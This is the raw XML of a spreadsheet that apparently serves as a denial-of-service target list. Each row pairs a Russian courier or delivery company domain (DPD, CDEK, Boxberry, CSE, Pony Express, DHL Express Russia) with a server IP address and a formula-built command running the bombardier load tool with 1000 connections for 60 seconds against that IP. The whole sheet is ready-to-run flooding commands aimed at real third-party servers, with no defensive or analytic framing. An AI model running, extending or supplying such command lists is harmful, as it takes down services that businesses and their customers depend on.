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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" uniqueCount="140">
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.206.216.121&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>91.206.216.121</t>
  </si>
  <si>
    <r>
      <rPr>
        <u val="single"/>
        <sz val="12"/>
        <color indexed="11"/>
        <rFont val="Calibri"/>
      </rPr>
      <t>ponyexpress.ru</t>
    </r>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.32.57.158&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>185.32.57.158</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.206.217.30&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>91.206.217.30</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 217.73.60.2&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>217.73.60.2</t>
  </si>
  <si>
    <r>
      <rPr>
        <u val="single"/>
        <sz val="12"/>
        <color indexed="11"/>
        <rFont val="Calibri"/>
      </rPr>
      <t>express.dhl.ru</t>
    </r>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.209.80.6&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>91.209.80.6</t>
  </si>
  <si>
    <r>
      <rPr>
        <u val="single"/>
        <sz val="12"/>
        <color indexed="11"/>
        <rFont val="Calibri"/>
      </rPr>
      <t>dpd.ru</t>
    </r>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 77.43.147.90&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>77.43.147.90</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.209.80.9&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>91.209.80.9</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.209.80.233&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>91.209.80.233</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 37.143.8.107&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>37.143.8.107</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 88.99.94.22&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>88.99.94.22</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.209.80.24&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>91.209.80.24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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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91.209.80.7&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>91.209.80.7</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 159.69.63.246&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>159.69.63.246</t>
  </si>
  <si>
    <r>
      <rPr>
        <u val="single"/>
        <sz val="12"/>
        <color indexed="11"/>
        <rFont val="Calibri"/>
      </rPr>
      <t>boxberry.ru</t>
    </r>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 159.69.63.247&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>159.69.63.247</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 159.69.63.248&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>159.69.63.248</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 188.130.235.116&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>188.130.235.116</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 89.111.60.15&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>89.111.60.15</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.65.22.18&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>185.65.22.18</t>
  </si>
  <si>
    <r>
      <rPr>
        <u val="single"/>
        <sz val="12"/>
        <color indexed="11"/>
        <rFont val="Calibri"/>
      </rPr>
      <t>cse.ru</t>
    </r>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.65.21.153&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>185.65.21.153</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.65.22.8&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>185.65.22.8</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.65.21.53&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>185.65.21.53</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.65.20.23&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>185.65.20.23</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.248.232.125&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>178.248.232.125</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.248.232.188&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>178.248.232.188</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.65.22.17&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>185.65.22.17</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.65.22.9&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>185.65.22.9</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.65.22.35&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>185.65.22.35</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.65.22.5&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>185.65.22.5</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.65.22.25&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>185.65.22.25</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.65.22.70&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>185.65.22.70</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.65.20.5&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>185.65.20.5</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 78.46.28.63&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>78.46.28.63</t>
  </si>
  <si>
    <r>
      <rPr>
        <u val="single"/>
        <sz val="12"/>
        <color indexed="11"/>
        <rFont val="Calibri"/>
      </rPr>
      <t>cdek.ru</t>
    </r>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.189.222.60&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>195.189.222.60</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.189.222.41&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>195.189.222.41</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.189.222.59&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>195.189.222.59</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.189.222.57&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>195.189.222.57</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.189.222.19&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>195.189.222.19</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.215.4.10&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>185.215.4.10</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.189.222.56&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>195.189.222.56</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.215.4.20&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>185.215.4.20</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.165.123.40&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>185.165.123.40</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.165.123.206&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>185.165.123.206</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.165.123.200&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>185.165.123.200</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 194.49.120.61&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>194.49.120.61</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 194.49.120.62&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>194.49.120.62</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.189.222.55&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>195.189.222.55</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 194.49.120.60&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>194.49.120.60</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 194.49.120.1&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>194.49.120.1</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 194.49.121.18&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>194.49.121.18</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.209.80.225&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>91.209.80.225</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 1.15.8.2&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>1.15.8.2</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.169.155.177&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>185.169.155.177</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.209.80.61&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>91.209.80.61</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.209.80.254&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>91.209.80.254</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.209.80.224&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>91.209.80.224</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.209.80.219&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>91.209.80.219</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.209.80.237&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>91.209.80.237</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.209.80.240&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>91.209.80.240</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.209.80.64&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>91.209.80.64</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.209.80.223&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>91.209.80.223</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.209.80.249&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>91.209.80.249</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.209.80.220&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>91.209.80.220</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.209.80.71&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>91.209.80.71</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.209.80.62&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>91.209.80.62</t>
  </si>
  <si>
    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.209.80.17&amp;&amp; sleep 5;</t>
  </si>
  <si>
    <t>91.209.80.17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</si>
</sst>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onyexpress.ru" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ponyexpress.ru" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ponyexpress.ru" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://express.dhl.ru" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dpd.ru" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dpd.ru" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dpd.ru" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dpd.ru" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dpd.ru" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dpd.ru" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dpd.ru" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dpd.ru" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dpd.ru" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dpd.ru" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://boxberry.ru" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://boxberry.ru" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://boxberry.ru" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://boxberry.ru" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://boxberry.ru" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cse.ru" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cse.ru" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cse.ru" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cse.ru" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cse.ru" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cse.ru" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cse.ru" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cse.ru" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cse.ru" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cse.ru" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cse.ru" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cse.ru" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cse.ru" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cse.ru" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cdek.ru" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cdek.ru" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cdek.ru" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cdek.ru" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cdek.ru" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cdek.ru" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cdek.ru" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cdek.ru" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cdek.ru" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cdek.ru" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cdek.ru" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cdek.ru" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cdek.ru" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cdek.ru" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cdek.ru" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cdek.ru" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cdek.ru" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cdek.ru" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dpd.ru" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dpd.ru" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dpd.ru" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dpd.ru" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dpd.ru" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dpd.ru" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dpd.ru" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dpd.ru" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dpd.ru" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dpd.ru" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dpd.ru" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dpd.ru" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dpd.ru" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dpd.ru" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dpd.ru" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dpd.ru" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dpd.ru" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dpd.ru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3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2</v>
      </c>
      <c r="D3" s="3"/>
      <c r="E3" s="3"/>
    </row>
    <row r="4" ht="15.35" customHeight="1">
      <c r="A4" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B4&amp;"&amp;&amp; sleep 5;"</f>
        <v>7</v>
      </c>
      <c r="B4" t="s" s="2">
        <v>8</v>
      </c>
      <c r="C4" t="s" s="2">
        <v>9</v>
      </c>
      <c r="D4" s="3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12</v>
      </c>
      <c r="D5" s="3"/>
      <c r="E5" s="3"/>
    </row>
    <row r="6" ht="15.35" customHeight="1">
      <c r="A6" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B6&amp;"&amp;&amp; sleep 5;"</f>
        <v>13</v>
      </c>
      <c r="B6" t="s" s="2">
        <v>14</v>
      </c>
      <c r="C6" t="s" s="2">
        <v>12</v>
      </c>
      <c r="D6" s="3"/>
      <c r="E6" s="3"/>
    </row>
    <row r="7" ht="15.35" customHeight="1">
      <c r="A7" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B7&amp;"&amp;&amp; sleep 5;"</f>
        <v>15</v>
      </c>
      <c r="B7" t="s" s="2">
        <v>16</v>
      </c>
      <c r="C7" t="s" s="2">
        <v>12</v>
      </c>
      <c r="D7" s="3"/>
      <c r="E7" s="3"/>
    </row>
    <row r="8" ht="15.35" customHeight="1">
      <c r="A8" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B8&amp;"&amp;&amp; sleep 5;"</f>
        <v>17</v>
      </c>
      <c r="B8" t="s" s="2">
        <v>18</v>
      </c>
      <c r="C8" t="s" s="2">
        <v>12</v>
      </c>
      <c r="D8" s="3"/>
      <c r="E8" s="3"/>
    </row>
    <row r="9" ht="15.35" customHeight="1">
      <c r="A9" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B9&amp;"&amp;&amp; sleep 5;"</f>
        <v>19</v>
      </c>
      <c r="B9" t="s" s="2">
        <v>20</v>
      </c>
      <c r="C9" t="s" s="2">
        <v>12</v>
      </c>
      <c r="D9" s="3"/>
      <c r="E9" s="3"/>
    </row>
    <row r="10" ht="15.35" customHeight="1">
      <c r="A10" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B10&amp;"&amp;&amp; sleep 5;"</f>
        <v>21</v>
      </c>
      <c r="B10" t="s" s="2">
        <v>22</v>
      </c>
      <c r="C10" t="s" s="2">
        <v>12</v>
      </c>
      <c r="D10" s="3"/>
      <c r="E10" s="3"/>
    </row>
    <row r="11" ht="15.35" customHeight="1">
      <c r="A11" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B11&amp;"&amp;&amp; sleep 5;"</f>
        <v>23</v>
      </c>
      <c r="B11" t="s" s="2">
        <v>24</v>
      </c>
      <c r="C11" t="s" s="2">
        <v>12</v>
      </c>
      <c r="D11" s="3"/>
      <c r="E11" s="3"/>
    </row>
    <row r="12" ht="15.35" customHeight="1">
      <c r="A12" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B12&amp;"&amp;&amp; sleep 5;"</f>
        <v>25</v>
      </c>
      <c r="B12" t="s" s="2">
        <v>26</v>
      </c>
      <c r="C12" t="s" s="2">
        <v>12</v>
      </c>
      <c r="D12" s="3"/>
      <c r="E12" s="3"/>
    </row>
    <row r="13" ht="15.35" customHeight="1">
      <c r="A13" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B13&amp;"&amp;&amp; sleep 5;"</f>
        <v>27</v>
      </c>
      <c r="B13" t="s" s="2">
        <v>28</v>
      </c>
      <c r="C13" t="s" s="2">
        <v>12</v>
      </c>
      <c r="D13" s="3"/>
      <c r="E13" s="3"/>
    </row>
    <row r="14" ht="15.35" customHeight="1">
      <c r="A14" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B14&amp;"&amp;&amp; sleep 5;"</f>
        <v>29</v>
      </c>
      <c r="B14" t="s" s="2">
        <v>30</v>
      </c>
      <c r="C14" t="s" s="2">
        <v>12</v>
      </c>
      <c r="D14" s="3"/>
      <c r="E14" s="3"/>
    </row>
    <row r="15" ht="15.35" customHeight="1">
      <c r="A15" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B15&amp;"&amp;&amp; sleep 5;"</f>
        <v>31</v>
      </c>
      <c r="B15" t="s" s="2">
        <v>32</v>
      </c>
      <c r="C15" t="s" s="2">
        <v>33</v>
      </c>
      <c r="D15" s="3"/>
      <c r="E15" s="3"/>
    </row>
    <row r="16" ht="15.35" customHeight="1">
      <c r="A16" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B16&amp;"&amp;&amp; sleep 5;"</f>
        <v>34</v>
      </c>
      <c r="B16" t="s" s="2">
        <v>35</v>
      </c>
      <c r="C16" t="s" s="2">
        <v>33</v>
      </c>
      <c r="D16" s="3"/>
      <c r="E16" s="3"/>
    </row>
    <row r="17" ht="15.35" customHeight="1">
      <c r="A17" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B17&amp;"&amp;&amp; sleep 5;"</f>
        <v>36</v>
      </c>
      <c r="B17" t="s" s="2">
        <v>37</v>
      </c>
      <c r="C17" t="s" s="2">
        <v>33</v>
      </c>
      <c r="D17" s="3"/>
      <c r="E17" s="3"/>
    </row>
    <row r="18" ht="15.35" customHeight="1">
      <c r="A18" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B18&amp;"&amp;&amp; sleep 5;"</f>
        <v>38</v>
      </c>
      <c r="B18" t="s" s="2">
        <v>39</v>
      </c>
      <c r="C18" t="s" s="2">
        <v>33</v>
      </c>
      <c r="D18" s="3"/>
      <c r="E18" s="3"/>
    </row>
    <row r="19" ht="15.35" customHeight="1">
      <c r="A19" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B19&amp;"&amp;&amp; sleep 5;"</f>
        <v>40</v>
      </c>
      <c r="B19" t="s" s="2">
        <v>41</v>
      </c>
      <c r="C19" t="s" s="2">
        <v>33</v>
      </c>
      <c r="D19" s="3"/>
      <c r="E19" s="3"/>
    </row>
    <row r="20" ht="15.35" customHeight="1">
      <c r="A20" t="s" s="2">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B20&amp;"&amp;&amp; sleep 5;"</f>
        <v>42</v>
      </c>
      <c r="B20" t="s" s="2">
        <v>43</v>
      </c>
      <c r="C20" t="s" s="2">
        <v>44</v>
      </c>
      <c r="D20" s="3"/>
